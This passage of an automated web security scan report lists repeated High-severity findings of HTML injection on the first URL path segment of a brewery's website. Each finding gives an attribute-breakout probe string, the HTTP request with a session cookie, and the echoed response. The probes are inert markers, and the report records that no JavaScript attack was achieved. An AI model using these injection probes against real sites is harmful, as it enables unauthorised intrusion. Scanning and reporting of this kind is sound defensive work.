This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook233db"><a>e5397f42874/content/css/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook233db"><a>e5397f42874_page" class="facebook233db">
...[SNIP]...

1.287. http://www.ninkasibrewing.com/facebook/content/css/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6768c"><a>f97c43a5168 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook6768c"><a>f97c43a5168/content/css/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook6768c"><a>f97c43a5168_page" class="facebook6768c">
...[SNIP]...

1.288. http://www.ninkasibrewing.com/facebook/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bc93"><a>f6122ef7935 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook5bc93"><a>f6122ef7935/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook5bc93"><a>f6122ef7935_page" class="facebook5bc93">
...[SNIP]...

1.289. http://www.ninkasibrewing.com/facebook/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ebb"><a>62bdc34784c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookb2ebb"><a>62bdc34784c/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookb2ebb"><a>62bdc34784c_page" class="facebookb2ebb">
...[SNIP]...

1.290. http://www.ninkasibrewing.com/facebook/content/img/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e124c"><a>a5d48e2d007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke124c"><a>a5d48e2d007/content/img/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooke124c"><a>a5d48e2d007_page" class="facebooke124c">
...[SNIP]...

1.291. http://www.ninkasibrewing.com/facebook/content/img/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3145"><a>00514f46b2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka3145"><a>00514f46b2c/content/img/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooka3145"><a>00514f46b2c_page" class="facebooka3145">
...[SNIP]...

1.292. http://www.ninkasibrewing.com/facebook/content/img/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf7c"><a>481ef2418ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook9cf7c"><a>481ef2418ab/content/img/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook9cf7c"><a>481ef2418ab_page" class="facebook9cf7c">
...[SNIP]...

1.293. http://www.ninkasibrewing.com/facebook/content/img/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcbba"><a>275f83cf66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookdcbba"><a>275f83cf66/content/img/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookdcbba"><a>275f83cf66_page" class="facebookdcbba">
...[SNIP]...

1.294. http://www.ninkasibrewing.com/facebook/content/img/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c44"><a>859f4735ae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf6c44"><a>859f4735ae1/content/img/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf6c44"><a>859f4735ae1_page" class="facebookf6c44">
...[SNIP]...

1.295. http://www.ninkasibrewing.com/facebook/content/img/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f88bc"><a>053c5e72b0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf88bc"><a>053c5e72b0f/content/img/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf88bc"><a>053c5e72b0f_page" class="facebookf88bc">
...[SNIP]...

1.296. http://www.ninkasibrewing.com/facebook/content/img/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2eb"><a>bc8073585ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookbb2eb"><a>bc8073585ab/content/img/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookbb2eb"><a>bc8073585ab_page" class="facebookbb2eb">
...[SNIP]...

1.297. http://www.ninkasibrewing.com/facebook/content/img/skin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5800a"><a>a4b4f8152dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook5800a"><a>a4b4f8152dc/content/img/skin/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook5800a"><a>a4b4f8152dc_page" class="facebook5800a">
...[SNIP]...

1.298. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8d20"><a>cbd38bfb8dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf8d20"><a>cbd38bfb8dd/content/img/skin/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf8d20"><a>cbd38bfb8dd_page" class="facebookf8d20">
...[SNIP]...

1.299. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc8c"><a>4b90a1eb6c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookacc8c"><a>4b90a1eb6c3/content/img/skin/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookacc8c"><a>4b90a1eb6c3_page" class="facebookacc8c">
...[SNIP]...

1.300. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6775"><a>0b1efea915c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookc6775"><a>0b1efea915c/content/img/skin/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookc6775"><a>0b1efea915c_page" class="facebookc6775">
...[SNIP]...

1.301. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b1f9"><a>3337eb96f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook2b1f9"><a>3337eb96f99/content/img/skin/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook2b1f9"><a>3337eb96f99_page" class="facebook2b1f9">
...[SNIP]...

1.302. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e41c9"><a>38407733516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke41c9"><a>38407733516/content/img/skin/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooke41c9"><a>38407733516_page" class="facebooke41c9">
...[SNIP]...

1.303. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3d15"><a>6e87c3abe92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf3d15"><a>6e87c3abe92/content/img/skin/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf3d15"><a>6e87c3abe92_page" class="facebookf3d15">
...[SNIP]...

